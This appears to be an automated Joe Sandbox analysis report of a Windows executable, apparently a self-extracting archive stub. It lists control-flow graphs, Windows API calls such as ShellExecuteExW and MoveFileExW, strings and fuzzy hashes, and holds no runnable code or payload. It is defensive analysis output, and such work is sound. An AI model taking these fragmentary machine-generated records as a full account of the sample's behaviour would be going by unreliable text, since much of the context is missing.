                  control_flow_graph 406 18bdf5-18be0d call 18e28c call 18e360 411 18ca90-18ca9d 406->411 412 18be13-18be3d call 18aa36 406->412 412->411 415 18be43-18be48 412->415 416 18be49-18be57 415->416 417 18be58-18be6d call 18a6c7 416->417 420 18be6f 417->420 421 18be71-18be86 call 1817ac 420->421 424 18be88-18be8c 421->424 425 18be93-18be96 421->425 424->421 426 18be8e 424->426 427 18ca5c-18ca87 call 18aa36 425->427 428 18be9c 425->428 426->427 427->416 439 18ca8d-18ca8f 427->439 430 18c132-18c134 428->430 431 18bea3-18bea6 428->431 432 18c074-18c076 428->432 433 18c115-18c117 428->433 430->427 436 18c13a-18c141 430->436 431->427 438 18beac-18bf06 call 189da4 call 17b965 call 17a49d call 17a5d7 call 1770bf 431->438 432->427 437 18c07c-18c088 432->437 433->427 434 18c11d-18c12d SetWindowTextW 433->434 434->427 436->427 440 18c147-18c160 436->440 441 18c08a-18c09b call 197168 437->441 442 18c09c-18c0a1 437->442 494 18c045-18c05a call 17a52a 438->494 439->411 444 18c168-18c176 call 1935b3 440->444 445 18c162 440->445 441->442 448 18c0ab-18c0b6 call 18ab9a 442->448 449 18c0a3-18c0a9 442->449 444->427 463 18c17c-18c185 444->463 445->444 450 18c0bb-18c0bd 448->450 449->450 456 18c0c8-18c0e8 call 1935b3 call 1935de 450->456 457 18c0bf-18c0c6 call 1935b3 450->457 483 18c0ea-18c0f1 456->483 484 18c101-18c103 456->484 457->456 467 18c1ae-18c1b1 463->467 468 18c187-18c18b 463->468 471 18c296-18c2a4 call 17fe56 467->471 472 18c1b7-18c1ba 467->472 468->467 469 18c18d-18c195 468->469 469->427 475 18c19b-18c1a9 call 17fe56 469->475 485 18c2a6-18c2ba call 1917cb 471->485 477 18c1bc-18c1c1 472->477 478 18c1c7-18c1e2 472->478 475->485 495 18c22c-18c233 478->495 496 18c1e4-18c21e 478->496 490 18c0f8-18c100 call 197168 483->490 491 18c0f3-18c0f5 483->491 484->427 486 18c109-18c110 call 1935ce 484->486 505 18c2bc-18c2c0 485->505 506 18c2c7-18c318 call 17fe56 call 18a8d0 GetDlgItem SetWindowTextW SendMessageW call 1935e9 485->506 486->427 490->484 491->490 512 18bf0b-18bf1f SetFileAttributesW 494->512 513 18c060-18c06f call 17a4b3 494->513 499 18c261-18c284 call 1935b3 * 2 495->499 500 18c235-18c24d call 1935b3 495->500 529 18c220 496->529 530 18c222-18c224 496->530 499->485 534 18c286-18c294 call 17fe2e 499->534 500->499 516 18c24f-18c25c call 17fe2e 500->516 505->506 511 18c2c2-18c2c4 505->511 540 18c31d-18c321 506->540 511->506 517 18bfc5-18bfd5 GetFileAttributesW 512->517 518 18bf25-18bf58 call 17b4f7 call 17b207 call 1935b3 512->518 513->427 516->499 517->494 527 18bfd7-18bfe6 DeleteFileW 517->527 550 18bf5a-18bf69 call 1935b3 518->550 551 18bf6b-18bf79 call 17b925 518->551 527->494 533 18bfe8-18bfeb 527->533 529->530 530->495 537 18bfef-18c01b call 17400a GetFileAttributesW 533->537 534->485 546 18bfed-18bfee 537->546 547 18c01d-18c033 MoveFileW 537->547 540->427 545 18c327-18c33b SendMessageW 540->545 545->427 546->537 547->494 549 18c035-18c03f MoveFileExW 547->549 549->494 550->551 556 18bf7f-18bfbe call 1935b3 call 18f350 550->556 551->513 551->556 556->517
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018BDFA
                    • Part of subcall function 0018AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0018AAFE
                  • SetWindowTextW.USER32(?,?), ref: 0018C127
                  • _wcsrchr.LIBVCRUNTIME ref: 0018C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 0018C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 0018C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,001BA472), ref: 0018C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0018C335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: 277b0e85d26021e002aa7fda1608b5c4d09e739db72f40a5557b04669d425635
                  • Instruction ID: b3b761c2215595ccbb5b99292424b9011b9aecddb1fd462f0be2f913800b5000
                  • Opcode Fuzzy Hash: 277b0e85d26021e002aa7fda1608b5c4d09e739db72f40a5557b04669d425635
                  • Instruction Fuzzy Hash: 8AE16376D04118AADF25EBA0DC85EEF777CAF19351F104066F519E3091EB749B848FA0

                  Control-flow Graph

                  control_flow_graph 561 17d341-17d378 call 18e28c call 18e360 call 1915e8 568 17d3ab-17d3b4 call 17fe56 561->568 569 17d37a-17d3a9 GetModuleFileNameW call 17bc85 call 17fe2e 561->569 572 17d3b9-17d3dd call 179619 call 1799b0 568->572 569->572 580 17d3e3-17d3eb 572->580 581 17d7a0-17d7a6 call 179653 572->581 583 17d3ed-17d405 call 183781 * 2 580->583 584 17d409-17d438 call 195a90 * 2 580->584 585 17d7ab-17d7bb 581->585 595 17d407 583->595 594 17d43b-17d43e 584->594 596 17d444-17d44a call 179e40 594->596 597 17d56c-17d58f call 179d30 call 1935d3 594->597 595->584 601 17d44f-17d476 call 179bf0 596->601 597->581 606 17d595-17d5b0 call 179bf0 597->606 607 17d535-17d538 601->607 608 17d47c-17d484 601->608 620 17d5b2-17d5b7 606->620 621 17d5b9-17d5cc call 1935d3 606->621 612 17d53b-17d55d call 179d30 607->612 610 17d486-17d48e 608->610 611 17d4af-17d4ba 608->611 610->611 614 17d490-17d4aa call 195ec0 610->614 615 17d4e5-17d4ed 611->615 616 17d4bc-17d4c8 611->616 612->594 626 17d563-17d566 612->626 637 17d4ac 614->637 638 17d52b-17d533 614->638 618 17d4ef-17d4f7 615->618 619 17d519-17d51d 615->619 616->615 623 17d4ca-17d4cf 616->623 618->619 627 17d4f9-17d513 call 195ec0 618->627 619->607 628 17d51f-17d522 619->628 629 17d5f1-17d5f8 620->629 621->581 642 17d5d2-17d5ee call 18137a call 1935ce 621->642 623->615 625 17d4d1-17d4e3 call 195808 623->625 625->615 643 17d527 625->643 626->581 626->597 627->581 627->619 628->608 633 17d5fc-17d625 call 17fdfb call 1935d3 629->633 634 17d5fa 629->634 651 17d627-17d62e call 1935ce 633->651 652 17d633-17d649 633->652 634->633 637->611 638->612 642->629 643->638 651->581 654 17d731-17d757 call 17ce72 call 1935ce * 2 652->654 655 17d64f-17d65d 652->655 691 17d771-17d79d call 195a90 * 2 654->691 692 17d759-17d76f call 183781 * 2 654->692 658 17d664-17d669 655->658 660 17d66f-17d678 658->660 661 17d97c-17d984 658->661 662 17d684-17d68b 660->662 663 17d67a-17d67e 660->663 664 17d72b-17d72e 661->664 665 17d98a-17d98e 661->665 667 17d691-17d6b6 662->667 668 17d880-17d891 call 17fcbf 662->668 663->661 663->662 664->654 669 17d990-17d996 665->669 670 17d9de-17d9e4 665->670 674 17d6b9-17d6de call 1935b3 call 195808 667->674 693 17d897-17d8c0 call 17fe56 call 195885 668->693 694 17d976-17d979 668->694 675 17d722-17d725 669->675 676 17d99c-17d9a3 669->676 672 17d9e6-17d9ec 670->672 673 17da0a-17da2a call 17ce72 670->673 672->673 679 17d9ee-17d9f4 672->679 696 17da02-17da05 673->696 710 17d6f6 674->710 711 17d6e0-17d6ea 674->711 675->658 675->664 682 17d9a5-17d9a8 676->682 683 17d9ca 676->683 679->675 686 17d9fa-17da01 679->686 689 17d9c6-17d9c8 682->689 690 17d9aa-17d9ad 682->690 695 17d9cc-17d9d9 683->695 686->696 689->695 698 17d9c2-17d9c4 690->698 699 17d9af-17d9b2 690->699 691->581 692->691 693->694 720 17d8c6-17d93c call 181596 call 17fdfb call 17fdd4 call 17fdfb call 1958d9 693->720 694->661 695->675 698->695 705 17d9b4-17d9b8 699->705 706 17d9be-17d9c0 699->706 705->679 712 17d9ba-17d9bc 705->712 706->695 718 17d6f9-17d6fd 710->718 711->710 717 17d6ec-17d6f4 711->717 712->695 717->718 718->674 721 17d6ff-17d706 718->721 754 17d93e-17d947 720->754 755 17d94a-17d95f 720->755 723 17d7be-17d7c1 721->723 724 17d70c-17d71a call 17fdfb 721->724 723->668 726 17d7c7-17d7ce 723->726 731 17d71f 724->731 729 17d7d6-17d7d7 726->729 730 17d7d0-17d7d4 726->730 729->726 730->729 733 17d7d9-17d7e7 730->733 731->675 735 17d7e9-17d7ec 733->735 736 17d808-17d830 call 181596 733->736 738 17d805 735->738 739 17d7ee-17d803 735->739 743 17d853-17d85b 736->743 744 17d832-17d84e call 1935e9 736->744 738->736 739->735 739->738 747 17d862-17d87b call 17dd6b 743->747 748 17d85d 743->748 744->731 747->731 748->747 754->755 756 17d960-17d967 755->756 757 17d973-17d974 756->757 758 17d969-17d96d 756->758 757->756 758->731 758->757
                  APIs
                  • __EH_prolog.LIBCMT ref: 0017D346
                  • _wcschr.LIBVCRUNTIME ref: 0017D367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0017D328,?), ref: 0017D382
                  • __fprintf_l.LIBCMT ref: 0017D873
                    • Part of subcall function 0018137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B652,00000000,?,?,?,00010484), ref: 00181396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-980926923
                  • Opcode ID: c8f91907fe2b5892437f4c37700ccd4c6ce45185c85bdbffeac32558ef40943b
                  • Instruction ID: a03dbec31285da7fbe194e4692884a2eb87301ab2262257e288278a8d4776efd
                  • Opcode Fuzzy Hash: c8f91907fe2b5892437f4c37700ccd4c6ce45185c85bdbffeac32558ef40943b
                  • Instruction Fuzzy Hash: AE12B0B190021D9ADF24EFA4EC81BEEB7B5FF14704F108569F61AB7181EB709A45CB24

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0018AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                    • Part of subcall function 0018AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                    • Part of subcall function 0018AC74: IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                    • Part of subcall function 0018AC74: TranslateMessage.USER32(?), ref: 0018ACB8
                    • Part of subcall function 0018AC74: DispatchMessageW.USER32(?), ref: 0018ACC2
                  • GetDlgItem.USER32(00000068,001CECB0), ref: 0018CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0018A632,00000001,?,?,0018AECB,001A4F88,001CECB0), ref: 0018CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0018CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,001A35B4), ref: 0018CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0018CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0018CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,001A431C), ref: 0018CC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: d604fcdc3eef11050b5ff382434ca6e869f7af4e26f830865a37f9ead7907bd3
                  • Instruction ID: a102c6348cbdc955b3d6a70c8b35d49d4675c429432bd9defa9e613b3500d578
                  • Opcode Fuzzy Hash: d604fcdc3eef11050b5ff382434ca6e869f7af4e26f830865a37f9ead7907bd3
                  • Instruction Fuzzy Hash: 4B310472146741AFE301DF20DC4AFAB7FACEB92704F00050AF66096191DB744A44CBB6

                  Control-flow Graph
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 0018CF54
                  • ShowWindow.USER32(?,00000000), ref: 0018CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0018CFCF
                  • CloseHandle.KERNEL32(?), ref: 0018CFF5
                  • ShowWindow.USER32(?,00000001), ref: 0018D084
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  Strings
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 42200fca25179cb19a0d9bcf231c8cfe6dbaaac0807a2d1833130589a775252e
                  • Instruction ID: d55eab3c7e3a13ee3c8811ec58144fc7b9f599e1b65f464c89fe5af741ff836e
                  • Opcode Fuzzy Hash: 42200fca25179cb19a0d9bcf231c8cfe6dbaaac0807a2d1833130589a775252e
                  • Instruction Fuzzy Hash: 6E61E7714083809AE731BF64D804AABBBF6EF95304F04481EF5C597291D7B19B85CFA2

                  Control-flow Graph
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00194E35,00194E35,?,?,?,0019A2A9,00000001,00000001,3FE85006), ref: 0019A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0019A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0019A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0019A232
                  • __freea.LIBCMT ref: 0019A23F
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • __freea.LIBCMT ref: 0019A248
                  • __freea.LIBCMT ref: 0019A26D
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: aff0212f3da0e2fa7a4caa165f90cf2537a7cadf14e8afb59122e642a10a86b0
                  • Instruction ID: 2f7624a7202b5cab5b9d9b8c01be6817abdce69a6eb39b0b44879fcaa4bf12d6
                  • Opcode Fuzzy Hash: aff0212f3da0e2fa7a4caa165f90cf2537a7cadf14e8afb59122e642a10a86b0
                  • Instruction Fuzzy Hash: 8051C172610216AFEF298F64CC41EBB77AAEF51B50F954229FC04D6180DB36DC4886E2

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00180085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                    • Part of subcall function 00180085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  • OleInitialize.OLE32(00000000), ref: 0018A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0018A385
                  • SHGetMalloc.SHELL32(001B8430), ref: 0018A38F
                  Strings
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3Ro
                  • API String ID: 3498096277-3613677438
                  • Opcode ID: 6bc206159b03763af6b6f0f33fcbe03382625190ec87f42d66afa3e7815ae5e1
                  • Instruction ID: 43cc4cfcf1cb0b9914fa5fed18db34d765be38ea52ca78aa98b425c2fe60f4ef
                  • Opcode Fuzzy Hash: 6bc206159b03763af6b6f0f33fcbe03382625190ec87f42d66afa3e7815ae5e1
                  • Instruction Fuzzy Hash: A4F0E7B5901209ABCB10AF9998499EFFBFCEBA5701F00416AF864E2211DBB456458FA1

                  Control-flow Graph
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001778AD,?,00000005,?,00000011), ref: 00179A4C
                  • GetLastError.KERNEL32(?,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,001778AD,?,00000005,?), ref: 00179A8E
                  • GetLastError.KERNEL32(?,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00179ADB
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: 230033687ea5cf3c82c3ba3011bf9366b7c3cdef795e6d7795195bff44f95b1a
                  • Instruction ID: 52748a09092eaf5fc0d0fb015436ec7e9075f079709b3835530af91eeccf1cb8
                  • Opcode Fuzzy Hash: 230033687ea5cf3c82c3ba3011bf9366b7c3cdef795e6d7795195bff44f95b1a
                  • Instruction Fuzzy Hash: 2F4143705457466FE320DB20CC06BDABBE4BB06324F108719FAE8971D1E7B5A98CCB95

                  Control-flow Graph
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                  • IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                  • TranslateMessage.USER32(?), ref: 0018ACB8
                  • DispatchMessageW.USER32(?), ref: 0018ACC2
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: 6299483405a661a33d5da8000913344f55f21eaf44f7cc8992ed5964fb82a117
                  • Instruction ID: a6b79256b4f40f95f61a9ad63feda358b37bd70ebe79b7e99762e7cbd257dd0c
                  • Opcode Fuzzy Hash: 6299483405a661a33d5da8000913344f55f21eaf44f7cc8992ed5964fb82a117
                  • Instruction Fuzzy Hash: 9EF01D71903129AB9B20ABE69C4CEEF7F6CEF152517408516F415D2500EB38D545CBB1

                  Control-flow Graph
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 0018A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0018A315
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0018A305
                  Strings
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: EDIT
                  • API String ID: 4243998846-3080729518
                  • Opcode ID: 3d8329dde8f649dca5f7495a4c3ab201e258d14a625571ca5f921b5f6cc52f0f
                  • Instruction ID: 704d66a896c857748c4c24c45558347adff510636c46c3425e8507891f97ab03
                  • Opcode Fuzzy Hash: 3d8329dde8f649dca5f7495a4c3ab201e258d14a625571ca5f921b5f6cc52f0f
                  • Instruction Fuzzy Hash: C8F08232A422287BE720A6649C05F9B776CAF56B10F480057FD05A2180D770AA81CAF6

                  Control-flow Graph
                  APIs
                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0018D29D
                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0018D2D9
                  Strings
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: fd14d9a630706ecca90c9effd0903fe68630db11464327fcb06934b73afb4155
                  • Instruction ID: 580819047528a2a780ea904c69b34b8d63e6a94fa16af4699dffe681837f8291
                  • Opcode Fuzzy Hash: fd14d9a630706ecca90c9effd0903fe68630db11464327fcb06934b73afb4155
                  • Instruction Fuzzy Hash: C5F0A772800228A6C7203FE09C09FBA77AAAF1A751B044055FC4896181D760CE81DBF1

                  Control-flow Graph
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 0017985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00179876
                  • GetLastError.KERNEL32 ref: 001798A8
                  • GetLastError.KERNEL32 ref: 001798C7
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: d7365e08a6ec709d964af487ad94c6efbbdcd9f2e74051a2186d04e6bd1ceb7e
                  • Instruction ID: 7c27f4e6d9670e20365e8838ba12d3d60091e4425f6618f0923ec0981ed84845
                  • Opcode Fuzzy Hash: d7365e08a6ec709d964af487ad94c6efbbdcd9f2e74051a2186d04e6bd1ceb7e
                  • Instruction Fuzzy Hash: DA118E3090060CEBDB205B55C904A7977B8FB1B731F10C52AF86E95A90D7359E889F53
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00193713,00000000,00000000,?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue), ref: 0019A526
                  • GetLastError.KERNEL32(?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue,001A7348,001A7350,00000000,00000364,?,00199077), ref: 0019A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0019A49B,00193713,00000000,00000000,00000000,?,0019A698,00000006,FlsSetValue,001A7348,001A7350,00000000), ref: 0019A540
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 696e9eb145b968c8cbbe3c75819fc8b1ae95d428498f766d1a97929f80a02fe2
                  • Instruction ID: fae23b956ddeb75d96b77b55606b18ba263ad48e693e81c435078d44cfd32e52
                  • Opcode Fuzzy Hash: 696e9eb145b968c8cbbe3c75819fc8b1ae95d428498f766d1a97929f80a02fe2
                  • Instruction Fuzzy Hash: C4012632711222ABDF218B68AC44B67BB98AF46BA1B660620F916D3140D731DA44CAE1
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0017CC94,00000001,?,?,?,00000000,00184ECD,?,?,?), ref: 00179F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00184ECD,?,?,?,?,?,00184972,?), ref: 00179F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0017CC94,00000001,?,?), ref: 00179FB8
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: 7bd4eeec923691ce0eff9f526ae10cb7770c3d63044affa376158ab0fff2adf9
                  • Instruction ID: 973afaf8be591bb5ace40baff8748cc61b6790765e98f3dc902daa65a6436e9e
                  • Opcode Fuzzy Hash: 7bd4eeec923691ce0eff9f526ae10cb7770c3d63044affa376158ab0fff2adf9
                  • Instruction Fuzzy Hash: D631DE712083059BDB148F24D948BAABBB8EF91710F048A5DF859DA281C775D948CBA2
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A261
                  • GetLastError.KERNEL32(?,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A27E
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: af57b4d850cb892efcbceb3e01d894388958de147c19601f1f6d26e98887acab
                  • Instruction ID: 5e20d5cba7ada65f3c8e4a9176fffb14e250a170d7c88b8eee5eadde9bd9fb41
                  • Opcode Fuzzy Hash: af57b4d850cb892efcbceb3e01d894388958de147c19601f1f6d26e98887acab
                  • Instruction Fuzzy Hash: D301F531144214A6DB32AB744C05BED3778AF57781F84C451F90DE5052CB62CA80C6B7
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0019B019
                  Strings
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: 2f766e552c9995af1344c7ff9a62933aebba5718b5ea217789f2dcb58528cac2
                  • Instruction ID: ca57d52fb9f7ffd6e1d3df41539cea221d2d363b513095a3e9850925481bdd5b
                  • Opcode Fuzzy Hash: 2f766e552c9995af1344c7ff9a62933aebba5718b5ea217789f2dcb58528cac2
                  • Instruction Fuzzy Hash: B441277050834C9BDF258E24ADD4BFBBBB9EB55704F1804ECE59A87142D335AA45CF60
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0019A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: 9c2d87af03ab595fd7acafb11c619f132207fd4212e2ffe4f473eee3bf0744b2
                  • Instruction ID: 46dafc01fb731eb0622c93a78a4cdc9d84ad5dbe0910d38e3735b21103054f08
                  • Opcode Fuzzy Hash: 9c2d87af03ab595fd7acafb11c619f132207fd4212e2ffe4f473eee3bf0744b2
                  • Instruction Fuzzy Hash: 49011336540208BBCF06AFA0DC02EEE7F66FF09710F454114FE1826160CB328A71AB92
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00199D2F), ref: 0019A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 0019A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
